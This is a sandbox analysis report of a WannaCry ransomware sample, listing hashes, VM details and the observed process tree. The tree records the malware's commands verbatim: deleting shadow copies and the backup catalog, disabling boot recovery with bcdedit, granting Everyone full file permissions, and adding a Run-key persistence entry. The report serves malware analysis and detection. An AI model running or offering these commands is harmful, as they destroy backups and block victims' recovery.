WannaCry Ransomware | VMRay Analyzer Report
Analysis Information
Creation Time 2017-05-15 16:53 (UTC+2)
VM Analysis Duration Time 00:05:04
Execution Successful True
Sample Filename WanaDecrypt0r.bin.exe
Command Line Parameters False
Prescript False
Number of Processes 83
Termination Reason Maximum binlog size reached
VTI Information
VTI Score 100 / 100
VTI Database Version 2.5
VTI Rule Match Count 9957
VTI Rule Type Default (PE, ...)
Remarks
Critical The maximum number of extracted files was reached during the analysis. Some files may be missing in the reports. You can increase the limit in the configuration.
Critical The overall sleep time of all monitored processes was truncated from 18 minutes, 59 seconds to 6 minutes, 19 seconds to reveal dormant functionality.
Screenshots
Monitored Processes
Process Graph
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x924 Analysis Target High (Elevated) wanadecrypt0r.bin.exe "C:\Users\DSsDPMx042\Desktop\WanaDecrypt0r.bin.exe"
#2 0x3f4 RPC Server System (Elevated) svchost.exe C:\Windows\system32\svchost.exe -k LocalService #1
#4 0x4 Created Daemon System (Elevated) System #1
#5 0x984 Created Daemon System (Elevated) wanadecrypt0r.bin.exe C:\Users\DSsDPMx042\Desktop\WanaDecrypt0r.bin.exe -m security #1
#6 0x9b8 Child Process High (Elevated) tasksche.exe C:\WINDOWS\tasksche.exe /i #1
#7 0x9ec Created Daemon System (Elevated) cmd.exe cmd.exe /c "C:\ProgramData\qxtqusdnjzrizx418\tasksche.exe" #6
#8 0xa00 Child Process System (Elevated) tasksche.exe C:\ProgramData\qxtqusdnjzrizx418\tasksche.exe #7
#9 0xa5c Child Process System (Elevated) attrib.exe attrib +h . #8
#10 0xa64 Child Process System (Elevated) icacls.exe icacls . /grant Everyone:F /T /C /Q #8
#11 0xb94 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#12 0xbb4 Child Process System (Elevated) cmd.exe cmd /c 29121494860050.bat #8
#13 0xbec Child Process System (Elevated) cscript.exe cscript.exe //nologo m.vbs #12
#14 0xdbc Child Process System (Elevated) taskdl.exe taskdl.exe #8
#15 0xf74 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#16 0xfb8 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#17 0x864 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#18 0x840 Child Process System (Elevated) cmd.exe cmd.exe /c start /b @WanaDecryptor@.exe vs #8
#19 0x854 Child Process System (Elevated) @wanadecryptor@.exe @WanaDecryptor@.exe co #8
#20 0x810 Child Process System (Elevated) @wanadecryptor@.exe @WanaDecryptor@.exe vs #18
#21 0x784 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#22 0x128 Child Process System (Elevated) cmd.exe cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "qxtqusdnjzrizx418" /t REG_SZ /d "\"C:\ProgramData\qxtqusdnjzrizx418\tasksche.exe\"" /f #8
#23 0x430 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#24 0x878 Child Process System (Elevated) reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "qxtqusdnjzrizx418" /t REG_SZ /d "\"C:\ProgramData\qxtqusdnjzrizx418\tasksche.exe\"" /f #22
#25 0x31c Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #21
#26 0x814 Child Process System (Elevated) taskhsvc.exe TaskData\Tor\taskhsvc.exe #19
#27 0x36c Child Process System (Elevated) cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet #20
#28 0x8fc Child Process System (Elevated) vssadmin.exe vssadmin delete shadows /all /quiet #27
#29 0x150 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#30 0x880 RPC Server System (Elevated) vssvc.exe C:\Windows\system32\vssvc.exe #28
#31 0x92c Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#32 0x8cc Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #31
#33 0x8c RPC Server System (Elevated) svchost.exe C:\Windows\System32\svchost.exe -k swprv #30
#34 0x704 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#35 0x258 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#36 0x9c0 Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #34
#37 0xa40 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#38 0xa5c Child Process System (Elevated) taskdl.exe taskdl.exe #8
#39 0xa68 Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #37
#40 0xab4 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#41 0xac8 Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #40
#42 0xb1c Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#43 0xb2c Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #42
#44 0xb34 Child Process System (Elevated) wmic.exe wmic shadowcopy delete #27
#45 0xb4c Child Process System (Elevated) taskdl.exe taskdl.exe #8
#46 0x364 RPC Server System (Elevated) svchost.exe C:\Windows\system32\svchost.exe -k netsvcs #44
#47 0xbc4 RPC Server System (Elevated) wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding #46
#48 0xbb0 Child Process System (Elevated) bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures #27
#49 0xb94 Child Process System (Elevated) bcdedit.exe bcdedit /set {default} recoveryenabled no #27
#50 0xbd4 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#51 0xbe0 Child Process System (Elevated) wbadmin.exe wbadmin delete catalog -quiet #27
#52 0xbe8 Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #50
#53 0xc2c RPC Server System (Elevated) wbengine.exe "C:\Windows\system32\wbengine.exe" #51
#54 0xc6c RPC Server System (Elevated) vdsldr.exe C:\Windows\System32\vdsldr.exe -Embedding #53
#55 0xd0c RPC Server System (Elevated) vds.exe C:\Windows\System32\vds.exe #54
#56 0xc78 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#57 0xd58 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#58 0xd68 Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #57
#59 0xd78 RPC Server System (Elevated) wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding #46
#60 0xda4 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#61 0xdd8 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#62 0xe24 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#63 0xdbc Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#64 0xe40 Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #63
#65 0x57c Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #61
#66 0xea0 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#67 0xec0 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#68 0x2c0 RPC Server System (Elevated) svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted #46
#69 0xef4 Child Process System (Elevated) wmiadap.exe wmiadap.exe /F /T /R #46
#70 0xf14 Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #66
#71 0xf20 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#72 0xf54 Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #71
#73 0xf80 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#74 0xf88 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#75 0x664 Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #74
#76 0x180 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#77 0xc20 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#78 0x7a0 Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #76
#79 0xff0 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#80 0x498 Child Process System (Elevated) taskdl.exe taskdl.exe #8
#81 0x474 Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #79
#82 0x728 Child Process System (Elevated) taskse.exe taskse.exe C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe #8
#83 0x6dc Child Process Medium @wanadecryptor@.exe "C:\ProgramData\qxtqusdnjzrizx418\@WanaDecryptor@.exe" #82
#84 0x430 Child Process System (Elevated) taskdl.exe taskdl.exe #8
Sample Information
ID #1853086
MD5 Hash Value db349b97c37d22f5ea1d1841e3c89eb4
SHA1 Hash Value e889544aff85ffaf8b0d0da705105dee7c97fe26
SHA256 Hash Value 24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c
Filename WanaDecrypt0r.bin.exe
File Size 3.55 MB (3723264 bytes)
File Type Windows Exe (x86-32)
Analyzer and Virtual Machine Information
Analyzer Version 2.1.0
Analyzer Build Date 2017-05-15 15:58 (UTC+2)
Internet Explorer Version 8.0.7601.17514
Firefox Version 39.0
Java Version 8.0.1110.14
VM Name win7_32_sp1
VM Architecture x86 32-bit PAE
VM OS Windows 7
VM Kernel Version 6.1.7601.17514 (684da42a-30cc-450f-81c5-35b4d18944b1)